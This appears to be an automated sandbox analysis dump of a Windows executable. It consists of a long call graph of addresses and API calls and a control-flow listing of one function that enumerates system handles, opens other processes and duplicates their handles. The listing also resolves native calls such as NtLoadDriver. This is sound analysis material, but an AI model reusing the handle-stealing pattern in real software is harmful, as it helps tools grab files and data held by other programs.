API calls 39639->39640 39642 424f18 39640->39642 39643 424f24 39641->39643 39642->39502 39643->39502 39644->39506 39708 413f4f 39681->39708 39684 413f37 K32GetModuleFileNameExW 39685 413f4a 39684->39685 39685->38731 39687 413969 wcscpy 39686->39687 39688 41396c wcschr 39686->39688 39700 413a3a 39687->39700 39688->39687 39690 41398e 39688->39690 39713 4097f7 wcslen wcslen _memicmp 39690->39713 39692 41399a 39693 4139a4 memset 39692->39693 39694 4139e6 39692->39694 39714 409dd5 GetWindowsDirectoryW wcscpy 39693->39714 39695 413a31 wcscpy 39694->39695 39696 4139ec memset 39694->39696 39695->39700 39715 409dd5 GetWindowsDirectoryW wcscpy 39696->39715 39698 4139c9 wcscpy wcscat 39698->39700 39700->38731 39701 413a11 memcpy wcscat 39701->39700 39703 413cb0 GetModuleHandleW 39702->39703 39704 413cda 39702->39704 39703->39704 39705 413cbf GetProcAddress 39703->39705 39706 413ce3 GetProcessTimes 39704->39706 39707 413cf6 39704->39707 39705->39704 39706->38734 39707->38734 39709 413f2f 39708->39709 39710 413f54 39708->39710 39709->39684 39709->39685 39711 40a804 8 API calls 39710->39711 39712 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39711->39712 39712->39709 39713->39692 39714->39698 39715->39701 39716->38754 39717->38778 39719 409cf9 GetVersionExW 39718->39719 39720 409d0a 39718->39720 39719->39720 39720->38784 39720->38789 39721->38790 39722->38793 39723->38795 39724->38860 39726 40bba5 39725->39726 39786 40cc26 39726->39786 39729 40bd4b 39807 40cc0c 39729->39807 39734 40b2cc 27 API calls 39735 40bbef 39734->39735 39814 40ccf0 _wcsicmp 39735->39814 39737 40bbf5 39737->39729 39815 40ccb4 6 API calls 39737->39815 39739 40bc26 39740 40cf04 17 API calls 39739->39740 39741 40bc2e 39740->39741 39742 40bd43 39741->39742 39743 40b2cc 27 API calls 39741->39743 39744 40cc0c 4 API calls 39742->39744 39745 40bc40 39743->39745 39744->39729 39816 40ccf0 _wcsicmp 39745->39816 39747 40bc46 39747->39742 39748 40bc61 memset memset WideCharToMultiByte 39747->39748 39817 40103c strlen 39748->39817 39750 40bcc0 39751 40b273 27 API calls 39750->39751 39752 40bcd0 memcmp 39751->39752 39752->39742 39753 40bce2 39752->39753 39754 404423 37 API calls 39753->39754 39755 40bd10 39754->39755 39755->39742 39756 40bd3a LocalFree 39755->39756 39757 40bd1f memcpy 39755->39757 39756->39742 39757->39756 39758->38875 39760 42533e 16 API calls 39759->39760 39761 42541f 39760->39761 39762 424ff0 13 API calls 39761->39762 39763 425425 39762->39763 39764 42538f 16 API calls 39763->39764 39765 42542d 39764->39765 39765->38912 39767 42533e 16 API calls 39766->39767 39768 4253fb 39767->39768 39769 42538f 16 API calls 39768->39769 39770 42540b 39769->39770 39770->38912 39772 40b65c 39771->39772 39773 40b697 SystemTimeToFileTime 39772->39773 39776 40b681 39772->39776 39877 44d9c0 39773->39877 39775 40b6d6 FileTimeToLocalFileTime 39775->39776 39776->38912 39778 409a74 GetTempFileNameW 39777->39778 39779 409a66 GetWindowsDirectoryW 39777->39779 39778->38874 39779->39778 39780->38912 39781->38912 39782->38912 39783->38912 39784->38887 39785->38909 39818 4096c3 CreateFileW 39786->39818 39788 40cc34 39789 40cc3d GetFileSize 39788->39789 39797 40bbca 39788->39797 39790 40afcf 2 API calls 39789->39790 39791 40cc64 39790->39791 39819 40a2ef ReadFile 39791->39819 39793 40cc71 39820 40ab4a MultiByteToWideChar 39793->39820 39795 40cc95 FindCloseChangeNotification 39796 40b04b ??3@YAXPAX 39795->39796 39796->39797 39797->39729 39798 40cf04 39797->39798 39799 40b633 ??3@YAXPAX 39798->39799 39800 40cf14 39799->39800 39826 40b1ab ??3@YAXPAX ??3@YAXPAX 39800->39826 39802 40bbdd 39802->39729 39802->39734 39803 40cf1b 39803->39802 39805 40cfef 39803->39805 39827 40cd4b 39803->39827 39806 40cd4b 14 API calls 39805->39806 39806->39802 39808 40b633 ??3@YAXPAX 39807->39808 39809 40cc15 39808->39809 39810 40aa04 ??3@YAXPAX 39809->39810 39811 40cc1d 39810->39811 39876 40b1ab ??3@YAXPAX ??3@YAXPAX 39811->39876 39813 40b7d4 memset CreateFileW 39813->38867 39813->38868 39814->39737 39815->39739 39816->39747 39817->39750 39818->39788 39819->39793 39821 40ab6b 39820->39821 39825 40ab93 39820->39825 39822 40a9ce 4 API calls 39821->39822 39823 40ab74 39822->39823 39824 40ab7c MultiByteToWideChar 39823->39824 39824->39825 39825->39795 39826->39803 39828 40cd7b 39827->39828 39861 40aa29 39828->39861 39830 40cef5 39831 40aa04 ??3@YAXPAX 39830->39831 39832 40cefd 39831->39832 39832->39803 39834 40aa29 6 API calls 39835 40ce1d 39834->39835 39836 40aa29 6 API calls 39835->39836 39837 40ce3e 39836->39837 39838 40ce6a 39837->39838 39869 40abb7 wcslen memmove 39837->39869 39839 40ce9f 39838->39839 39872 40abb7 wcslen memmove 39838->39872 39841 40a8d0 7 API calls 39839->39841 39844 40ceb5 39841->39844 39842 40ce56 39870 40aa71 wcslen 39842->39870 39850 40a8d0 7 API calls 39844->39850 39846 40ce8b 39873 40aa71 wcslen 39846->39873 39847 40ce5e 39871 40abb7 wcslen memmove 39847->39871 39852 40cecb 39850->39852 39851 40ce93 39874 40abb7 wcslen memmove 39851->39874 39875 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39852->39875 39855 40cedd 39856 40aa04 ??3@YAXPAX 39855->39856 39857 40cee5 39856->39857 39858 40aa04 ??3@YAXPAX 39857->39858 39859 40ceed 39858->39859 39860 40aa04 ??3@YAXPAX 39859->39860 39860->39830 39862 40aa33 39861->39862 39863 40aa63 39861->39863 39864 40aa44 39862->39864 39865 40aa38 wcslen 39862->39865 39863->39830 39863->39834 39866 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39864->39866 39865->39864 39867 40aa4d 39866->39867 39867->39863 39868 40aa51 memcpy 39867->39868 39868->39863 39869->39842 39870->39847 39871->39838 39872->39846 39873->39851 39874->39839 39875->39855 39876->39813 39877->39775 39878->38928 39879->38936 39889 44def7 39890 44df07 39889->39890 39891 44df00 ??3@YAXPAX 39889->39891 39892 44df17 39890->39892 39893 44df10 ??3@YAXPAX 39890->39893 39891->39890 39894 44df27 39892->39894 39895 44df20 ??3@YAXPAX 39892->39895 39893->39892 39896 44df37 39894->39896 39897 44df30 ??3@YAXPAX 39894->39897 39895->39894 39897->39896 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 39898 40b0b5 ??3@YAXPAX ??3@YAXPAX 39899 4148b6 FindResourceW 39900 4148f9 39899->39900 39901 4148cf SizeofResource 39899->39901 39901->39900 39902 4148e0 LoadResource 39901->39902 39902->39900 39903 4148ee LockResource 39902->39903 39903->39900 37848 415304 ??3@YAXPAX 39904 441b3f 39914 43a9f6 39904->39914 39906 441b61 40087 4386af memset 39906->40087 39908 44189a 39909 4418e2 39908->39909 39913 442bd4 39908->39913 39911 4418ea 39909->39911 40088 4414a9 12 API calls 39909->40088 39913->39911 40089 441409 memset 39913->40089 39915 43aa20 39914->39915 39916 43aadf 39914->39916 39915->39916 39917 43aa34 memset 39915->39917 39916->39906 39918 43aa56 39917->39918 39919 43aa4d 39917->39919 40090 43a6e7 39918->40090 40098 42c02e memset 39919->40098 39924 43aad3 40100 4169a7 11 API calls 39924->40100 39925 43aaae 39925->39916 39925->39924 39940 43aae5 39925->39940 39926 43ac18 39929 43ac47 39926->39929 40102 42bbd5 memcpy memcpy memcpy memset memcpy 39926->40102 39930 43aca8 39929->39930 40103 438eed 16 API calls 39929->40103 39933 43acd5 39930->39933 40105 4233ae 11 API calls 39930->40105 40106 423426 11 API calls 39933->40106 39934 43ac87 40104 4233c5 16 API calls 39934->40104 39938 43ace1 40107 439811 163 API calls 39938->40107 39939 43a9f6 161 API calls 39939->39940 39940->39916 39940->39926 39940->39939 40101 439bbb 22 API calls 39940->40101 39942 43acfd 39948 43ad2c 39942->39948 40108 438eed 16 API calls 39942->40108 39944 43ad19 40109 4233c5 16 API calls 39944->40109 39945 43ad58 40110 44081d 163 API calls 39945->40110 39948->39945 39951 43add9 39948->39951 39950 43ae3a memset 39952 43ae73 39950->39952 39951->39951 40114 423426 11 API calls 39951->40114 40115 42e1c0 147 API calls 39952->40115 39953 43adab 40112 438c4e 163 API calls 39953->40112 39956 43ad6c 39956->39916 39956->39953 40111 42370b memset memcpy memset 39956->40111 39957 43adcc 40113 440f84 12 API calls 39957->40113 39958 43ae96 40116 42e1c0 147 API calls 39958->40116 39962 43aea8 39963 43aec1 39962->39963 40117 42e199 147 API calls 39962->40117 39965 43af00 39963->39965 40118 42e1c0 147 API calls 39963->40118 39965->39916 39968 43af1a 39965->39968 39969 43b3d9 39965->39969 40119 438eed 16 API calls 39968->40119 39974 43b3f6 39969->39974 39975 43b4c8 39969->39975 39971 43b60f 39971->39916 40178 4393a5 17 API calls 39971->40178 39972 43af2f 40120 4233c5 16 API calls 39972->40120 40160 432878 12 API calls 39974->40160 39984 43b4f2 39975->39984 40166 42bbd5 memcpy memcpy memcpy memset memcpy 39975->40166 39977 43af51 40121 423426 11 API calls 39977->40121 39980 43af7d 40122 423426 11 API calls 39980->40122 40167 43a76c 21 API calls 39984->40167 39985 43b529 40168 44081d 163 API calls 39985->40168 39986 43b462 40162 423330 11 API calls 39986->40162 39987 43af94 40123 423330 11 API calls 39987->40123 39991 43b47e 39995 43b497 39991->39995 40163 42374a memcpy memset memcpy memcpy memcpy 39991->40163 39992 43b544 39996 43b55c 39992->39996 40169 42c02e memset 39992->40169 39993 43b428 39993->39986 40161 432b60 16 API calls 39993->40161 39994 43afca 40124 423330 11 API calls 39994->40124 40164 4233ae 11 API calls 39995->40164 40170 43a87a 163 API calls 39996->40170 39998 43afdb 40125 4233ae 11 API calls 39998->40125 40004 43b56c 40007 43b58a 40004->40007 40171 423330 11 API calls 40004->40171 40005 43b4b1 40165 423399 11 API calls 40005->40165 40006 43afee 40126 44081d 163 API calls 40006->40126 40172 440f84 12 API calls 40007->40172 40012 43b4c1 40174 42db80 163 API calls 40012->40174 40014 43b592 40173 43a82f 16 API calls 40014->40173 40017 43b5b4 40175 438c4e 163 API calls 40017->40175 40019 43b5cf 40176 42c02e memset 40019->40176 40021 43b1ef 40137 4233c5 16 API calls 40021->40137 40022 43b005 40022->39916 40025 43b01f 40022->40025 40127 42d836 163 API calls 40022->40127 40025->40021 40135 423330 11 API calls 40025->40135 40136 42d71d 163 API calls 40025->40136 40026 43b212 40138 423330 11 API calls 40026->40138 40027 43b087 40128 4233ae 11 API calls 40027->40128 40029 43add4 40029->39971 40177 438f86 16 API calls 40029->40177 40033 43b22a 40139 42ccb5 11 API calls 40033->40139 40035 43b23f 40140 4233ae 11 API calls 40035->40140 40036 43b10f 40131 423330 11 API calls 40036->40131 40038 43b257 40141 4233ae 11 API calls 40038->40141 40042 43b129 40132 4233ae 11 API calls 40042->40132 40043 43b26e 40142 4233ae 11 API calls 40043->40142 40046 43b09a 40046->40036 40129 42cc15 19 API calls 40046->40129 40130 4233ae 11 API calls 40046->40130 40047 43b282 40143 43a87a 163 API calls 40047->40143 40049 43b13c 40133 440f84 12 API calls 40049->40133 40051 43b29d 40144 423330 11 API calls 40051->40144 40054 43b15f 40134 4233ae 11 API calls 40054->40134 40055 43b2af 40057 43b2b8 40055->40057 40058 43b2ce 40055->40058 40145 4233ae 11 API calls 40057->40145 40146 440f84 12 API calls 40058->40146 40061 43b2da 40147 42370b memset memcpy memset 40061->40147 40062 43b2c9 40148 4233ae 11 API calls 40062->40148 40065 43b2f9 40149 423330 11 API calls 40065->40149 40067 43b30b 40150 423330 11 API calls 40067->40150 40069 43b325 40151 423399 11 API calls 40069->40151 40071 43b332 40152 4233ae 11 API calls 40071->40152 40073 43b354 40153 423399 11 API calls 40073->40153 40075 43b364 40154 43a82f 16 API calls 40075->40154 40077 43b370 40155 42db80 163 API calls 40077->40155 40079 43b380 40156 438c4e 163 API calls 40079->40156 40081 43b39e 40157 423399 11 API calls 40081->40157 40083 43b3ae 40158 43a76c 21 API calls 40083->40158 40085 43b3c3 40159 423399 11 API calls 40085->40159 40087->39908 40088->39911 40089->39913 40091 43a6f5 40090->40091 40094 43a765 40090->40094 40091->40094 40179 42a115 40091->40179 40094->39916 40099 4397fd memset 40094->40099 40096 43a73d 40096->40094 40097 42a115 147 API calls 40096->40097 40097->40094 40098->39918 40099->39925 40100->39916 40101->39940 40102->39929 40103->39934 40104->39930 40105->39933 40106->39938 40107->39942 40108->39944 40109->39948 40110->39956 40111->39953 40112->39957 40113->40029 40114->39950 40115->39958 40116->39962 40117->39963 40118->39963 40119->39972 40120->39977 40121->39980 40122->39987 40123->39994 40124->39998 40125->40006 40126->40022 40127->40027 40128->40046 40129->40046 40130->40046 40131->40042 40132->40049 40133->40054 40134->40025 40135->40025 40136->40025 40137->40026 40138->40033 40139->40035 40140->40038 40141->40043 40142->40047 40143->40051 40144->40055 40145->40062 40146->40061 40147->40062 40148->40065 40149->40067 40150->40069 40151->40071 40152->40073 40153->40075 40154->40077 40155->40079 40156->40081 40157->40083 40158->40085 40159->40029 40160->39993 40161->39986 40162->39991 40163->39995 40164->40005 40165->40012 40166->39984 40167->39985 40168->39992 40169->39996 40170->40004 40171->40007 40172->40014 40173->40012 40174->40017 40175->40019 40176->40029 40177->39971 40178->39916 40180 42a175 40179->40180 40182 42a122 40179->40182 40180->40094 40185 42b13b 147 API calls 40180->40185 40182->40180 40183 42a115 147 API calls 40182->40183 40186 43a174 40182->40186 40210 42a0a8 147 API calls 40182->40210 40183->40182 40185->40096 40200 43a196 40186->40200 40201 43a19e 40186->40201 40187 43a306 40187->40200 40230 4388c4 14 API calls 40187->40230 40190 42a115 147 API calls 40190->40201 40192 43a642 40192->40200 40234 4169a7 11 API calls 40192->40234 40196 43a635 40233 42c02e memset 40196->40233 40200->40182 40201->40187 40201->40190 40201->40200 40211 42ff8c 40201->40211 40219 415a91 40201->40219 40223 4165ff 40201->40223 40226 439504 13 API calls 40201->40226 40227 4312d0 147 API calls 40201->40227 40228 42be4c memcpy memcpy memcpy memset memcpy 40201->40228 40229 43a121 11 API calls 40201->40229 40203 43a325 40203->40192 40203->40196 40203->40200 40204 4169a7 11 API calls 40203->40204 40205 42b5b5 memset memcpy 40203->40205 40206 42bf4c 14 API calls 40203->40206 40209 4165ff 11 API calls 40203->40209 40231 42b63e 14 API calls 40203->40231 40232 42bfcf memcpy 40203->40232 40204->40203 40205->40203 40206->40203 40209->40203 40210->40182 40235 43817e 40211->40235 40213 42ff9d 40213->40201 40214 42ff99 40214->40213 40215 42ffe3 40214->40215 40216 42ffd0 40214->40216 40240 4169a7 11 API calls 40215->40240 40239 4169a7 11 API calls 40216->40239 40220 415a9d 40219->40220 40221 415ab3 40220->40221 40222 415aa4 memset 40220->40222 40221->40201 40222->40221 40384 4165a0 40223->40384 40226->40201 40227->40201 40228->40201 40229->40201 40230->40203 40231->40203 40232->40203 40233->40192 40234->40200 40236 438187 40235->40236 40238 438192 40235->40238 40241 4380f6 40236->40241 40238->40214 40239->40213 40240->40213 40243 43811f 40241->40243 40242 438164 40242->40238 40243->40242 40245 4300e8 3 API calls 40243->40245 40246 437e5e 40243->40246 40245->40243 40269 437d3c 40246->40269 40248 437eb3 40248->40243 40249 437ea9 40249->40248 40254 437f22 40249->40254 40284 41f432 40249->40284 40252 437f06 40331 415c56 11 API calls 40252->40331 40256 432d4e 3 API calls 40254->40256 40257 437f7f 40254->40257 40255 437f95 40332 415c56 11 API calls 40255->40332 40256->40257 40257->40255 40258 43802b 40257->40258 40260 4165ff 11 API calls 40258->40260 40261 438054 40260->40261 40295 437371 40261->40295 40264 43806b 40265 438094 40264->40265 40333 42f50e 138 API calls 40264->40333 40267 4300e8 3 API calls 40265->40267 40268 437fa3 40265->40268 40267->40268 40268->40248 40334 41f638 104 API calls 40268->40334 40270 437d69 40269->40270 40273 437d80 40269->40273 40335 437ccb 11 API calls 40270->40335 40272 437d76 40272->40249 40273->40272 40274 437da3 40273->40274 40276 437d90 40273->40276 40277 438460 134 API calls 40274->40277 40276->40272 40339 437ccb 11 API calls 40276->40339 40280 437dcb 40277->40280 40278 437de8 40338 424f26 123 API calls 40278->40338 40280->40278 40336 444283 13 API calls 40280->40336 40282 437dfc 40337 437ccb 11 API calls 40282->40337 40285 41f54d 40284->40285 40291 41f44f 40284->40291 40286 41f466 40285->40286 40369 41c635 memset memset 40285->40369 40286->40252 40286->40254 40291->40286 40293 41f50b 40291->40293 40340 41f1a5 40291->40340 40365 41c06f memcmp 40291->40365 40366 41f3b1 90 API calls 40291->40366 40367 41f398 86 API calls 40291->40367 40293->40285 40293->40286 40368 41c295 86 API calls 40293->40368 40370 41703f 40295->40370 40297 437399 40298 43739d 40297->40298 40301 4373ac 40297->40301 40377 4446ea 11 API calls 40298->40377 40300 4373a7 40300->40264 40302 416935 16 API calls 40301->40302 40303 4373ca 40302->40303 40305 438460 134 API calls 40303->40305 40309 4251c4 137 API calls 40303->40309 40313 415a91 memset 40303->40313 40315 425413 17 API calls 40303->40315 40316 43758f 40303->40316 40320 42533e 16 API calls 40303->40320 40327 42538f 16 API calls 40303->40327 40328 437584 40303->40328 40330 437d3c 135 API calls 40303->40330 40378 425433 13 API calls 40303->40378 40379 42453e 123 API calls 40303->40379 40304 4375bc 40307 415c7d 16 API calls 40304->40307 40305->40303 40308 4375d2 40307->40308 40308->40300 40310 4442e6 11 API calls 40308->40310 40309->40303 40311 4375e2 40310->40311 40311->40300 40382 444283 13 API calls 40311->40382 40313->40303 40315->40303 40380 42453e 123 API calls 40316->40380 40317 4375f4 40322 437620 40317->40322 40323 43760b 40317->40323 40320->40303 40321 43759f 40324 416935 16 API calls 40321->40324 40326 416935 16 API calls 40322->40326 40383 444283 13 API calls 40323->40383 40324->40328 40326->40300 40327->40303 40328->40304 40381 42453e 123 API calls 40328->40381 40329 437612 memcpy 40329->40300 40330->40303 40331->40248 40332->40268 40333->40265 40334->40248 40335->40272 40336->40282 40337->40278 40338->40272 40339->40272 40341 41bc3b 101 API calls 40340->40341 40342 41f1b4 40341->40342 40343 41edad 86 API calls 40342->40343 40350 41f282 40342->40350 40344 41f1cb 40343->40344 40345 41f1f5 memcmp 40344->40345 40346 41f20e 40344->40346 40344->40350 40345->40346 40347 41f21b memcmp 40346->40347 40346->40350 40348 41f326 40347->40348 40351 41f23d 40347->40351 40349 41ee6b 86 API calls 40348->40349 40348->40350 40349->40350 40350->40291 40351->40348 40352 41f28e memcmp 40351->40352 40354 41c8df 56 API calls 40351->40354 40352->40348 40353 41f2a9 40352->40353 40353->40348 40356 41f308 40353->40356 40357 41f2d8 40353->40357 40355 41f269 40354->40355 40355->40348 40358 41f287 40355->40358 40359 41f27a 40355->40359 40356->40348 40363 4446ce 11 API calls 40356->40363 40360 41ee6b 86 API calls 40357->40360 40358->40352 40361 41ee6b 86 API calls 40359->40361 40362 41f2e0 40360->40362 40361->40350 40364 41b1ca memset 40362->40364 40363->40348 40364->40350 40365->40291 40366->40291 40367->40291 40368->40285 40369->40286 40371 417044 40370->40371 40372 41705c 40370->40372 40374 416760 11 API calls 40371->40374 40376 417055 40371->40376 40373 417075 40372->40373 40375 41707a 11 API calls 40372->40375 40373->40297 40374->40376 40375->40371 40376->40297 40377->40300 40378->40303 40379->40303 40380->40321 40381->40304 40382->40317 40383->40329 40389 415cfe 40384->40389 40393 415d23 40389->40393 40396 41628e 40389->40396 40390 4163ca 40403 416422 11 API calls 40390->40403 40392 416172 memset 40392->40393 40393->40390 40393->40392 40394 416422 10 API calls 40393->40394 40395 415cb9 10 API calls 40393->40395 40393->40396 40394->40393 40395->40393 40397 416520 40396->40397 40398 416527 40397->40398 40402 416574 40397->40402 40400 416544 40398->40400 40398->40402 40404 4156aa 11 API calls 40398->40404 40401 416561 memcpy 40400->40401 40400->40402 40401->40402 40402->40201 40403->40396 40404->40400 40429 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37683 425711 37674->37683 37688 425ad6 37675->37688 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37681 4260dd 37737 424251 120 API calls 37681->37737 37683->37675 37686 4259da 37683->37686 37691 422aeb memset memcpy memcpy 37683->37691 37692 429a4d 37683->37692 37695 4260a1 37683->37695 37706 4259c2 37683->37706 37709 425a38 37683->37709 37726 4227f0 memset memcpy 37683->37726 37727 422b84 15 API calls 37683->37727 37728 422b5d memset memcpy memcpy 37683->37728 37729 422640 13 API calls 37683->37729 37731 4241fc 11 API calls 37683->37731 37732 42413a 90 API calls 37683->37732 37736 416760 11 API calls 37686->37736 37691->37683 37693 429a66 37692->37693 37697 429a9b 37692->37697 37739 415c56 11 API calls 37693->37739 37735 415c56 11 API calls 37695->37735 37698 429a96 37697->37698 37741 416760 11 API calls 37697->37741 37742 424251 120 API calls 37698->37742 37701 429a7a 37740 416760 11 API calls 37701->37740 37706->37688 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37683 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37683 37727->37683 37728->37683 37729->37683 37730->37686 37731->37683 37732->37683 37733->37709 37734->37709 37735->37686 37736->37681 37737->37688 37738->37683 37739->37701 37740->37698 37741->37698 37742->37675 37743->37686 37745 41fbf1 37744->37745 37746 41fbf8 37744->37746 37749 41fc39 37745->37749 37768 4446ce 11 API calls 37745->37768 37758 41ee26 37746->37758 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37764 41ee3c 37764->37745 37766 41ee58 37766->37764 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37764 37773 41eb85 11 API calls 37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37834 41bf99 86 API calls 37775->37834 37776->37764 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37785 41be8c 37779->37785 37799 418c63 37779->37799 37813 4446ce 11 API calls 37780->37813 37782 41be69 37782->37764 37782->37773 37784 41bee7 37784->37782 37817 41a453 86 API calls 37784->37817 37785->37782 37785->37784 37786 41bf3a 37785->37786 37788 41bed1 37785->37788 37816 4446ce 11 API calls 37786->37816 37790 41bef0 37788->37790 37793 41bee2 37788->37793 37790->37784 37791 41bf01 37790->37791 37792 41bf24 memset 37791->37792 37794 41bf14 37791->37794 37814 418a6d memset memcpy memset 37791->37814 37792->37782 37803 41ac13 37793->37803 37815 41a223 memset memcpy memset 37794->37815 37798 41bf20 37798->37792 37802 418c72 37799->37802 37800 418d51 memset memset 37801 418c94 37800->37801 37801->37785 37802->37800 37802->37801 37804 41ac52 37803->37804 37805 41ac3f memset 37803->37805 37808 41ac6a 37804->37808 37818 41dc14 19 API calls 37804->37818 37806 41acd9 37805->37806 37806->37784 37809 41aca1 37808->37809 37819 41519d 37808->37819 37809->37806 37811 41acc0 memset 37809->37811 37812 41accd memcpy 37809->37812 37811->37806 37812->37806 37813->37782 37814->37794 37815->37798 37816->37784 37818->37808 37822 4175ed 37819->37822 37830 417570 SetFilePointer 37822->37830 37825 41760a ReadFile 37826 417637 37825->37826 37827 417627 GetLastError 37825->37827 37828 4151b3 37826->37828 37829 41763e memset 37826->37829 37827->37828 37828->37809 37829->37828 37831 4175b2 37830->37831 37832 41759c GetLastError 37830->37832 37831->37825 37831->37828 37832->37831 37833 4175a8 GetLastError 37832->37833 37833->37831 37834->37776 37835 417bc5 37836 417c61 37835->37836 37841 417bda 37835->37841 37837 417bf6 UnmapViewOfFile CloseHandle 37837->37837 37837->37841 37839 417c2c 37839->37841 37847 41851e 20 API calls 37839->37847 37841->37836 37841->37837 37841->37839 37842 4175b7 37841->37842 37843 4175d6 FindCloseChangeNotification 37842->37843 37844 4175c8 37843->37844 37845 4175df 37843->37845 37844->37845 37846 4175ce Sleep 37844->37846 37845->37841 37846->37843 37847->37839 39880 4147f3 39883 414561 39880->39883 39882 414813 39884 41456d 39883->39884 39885 41457f GetPrivateProfileIntW 39883->39885 39888 4143f1 memset _itow WritePrivateProfileStringW 39884->39888 39885->39882 39887 41457a 39887->39882 39888->39887

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 353->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
